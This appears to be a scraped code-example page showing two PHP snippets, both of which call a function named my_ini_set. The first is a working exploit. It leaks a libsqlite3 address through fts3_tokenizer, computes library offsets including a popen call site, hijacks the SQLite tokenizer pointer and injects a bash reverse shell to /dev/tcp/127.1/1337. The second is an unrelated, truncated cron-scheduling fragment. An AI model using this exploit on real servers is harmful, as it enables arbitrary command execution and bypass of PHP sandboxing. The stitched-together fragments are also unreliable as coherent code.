Ejemplo n.º 1
0
// .text:00000000002F138F   mov   [rsp+88h+var_58], rdx
// .text:00000000002F1394   mov   rax, fs:28h
// .text:00000000002F139D   mov   [rsp+88h+var_40], rax
// .text:00000000002F13A2   xor   eax, eax
// .text:00000000002F13A4   mov   [rsp+88h+var_50], rcx
// .text:00000000002F13A9   mov   [rsp+88h+var_48], 0
// .text:00000000002F13B2   call  _popen
$system = 0x2f137a;
// libsqlite3
$simpleTokenizerModule = 0x2c1be0;
$simpleCreate = 0x29400;
$db = new SQLite3(":memory:");
if (isset($_GET['base'])) {
    // step two
    $libmysqlnd_base = hexdec($_GET['base']);
    $stage = $libmysqlnd_base + $fake_module;
    $bomb = flip(dechex($stage));
    $db->exec("select fts3_tokenizer('simple', x'{$bomb}');\n    create virtual table a using fts3;\n    insert into a values('bash -c \"bash>/dev/tcp/127.1/1337 0<&1\"')");
} else {
    // step one
    $row = $db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();
    $leaked_addr = $row['addr'];
    $db->close();
    $addr = hexdec(flip($leaked_addr));
    $libsqlite3_base = $addr - $simpleTokenizerModule;
    $libphp_base = $libsqlite3_base + 0x6234000;
    $libmysqlnd_base = $libsqlite3_base + 0x113a000;
    $simple_create = $libsqlite3_base + $simpleCreate;
    my_ini_set(array('mysqlnd.net_cmd_buffer_size' => $simple_create, 'mysqlnd.log_mask' => $libphp_base + $system));
    die(dechex($libmysqlnd_base));
}
Ejemplo n.º 2
0
     $offset = 24 * 60 * 60;
 }
 if ($period == "weekly") {
     $offset = 7 * 24 * 60 * 60;
 }
 if ($period == "monthly") {
     $offset = 4 * 7 * 24 * 60 * 60;
 }
 if (preg_match('/^\\d+/', $period)) {
     // If is digits
     $offset = (int) $period;
     // Set to int
 }
 $ref = $tim + $offset;
 // Create new repeat time marker
 my_ini_set($file, $key, 'ref', $ref);
 // Save to ini file for later use
 // There are two file types that can be run browser or local CLI example:
 // http://localhost/drupal/cron.php
 // ..\..\plugins\dtdns_updater\dtdns_updater.php
 // A user specifies only the path/filename
 if (preg_match('/^http/', $path)) {
     // Is it a browser address
     $dummy = @file($path);
     // Yes: Run on Server, $dummy not used
     if ($logging) {
         cron_log($path);
         // Save to log and add time
     }
 } else {
     // No: Hence run local PHP script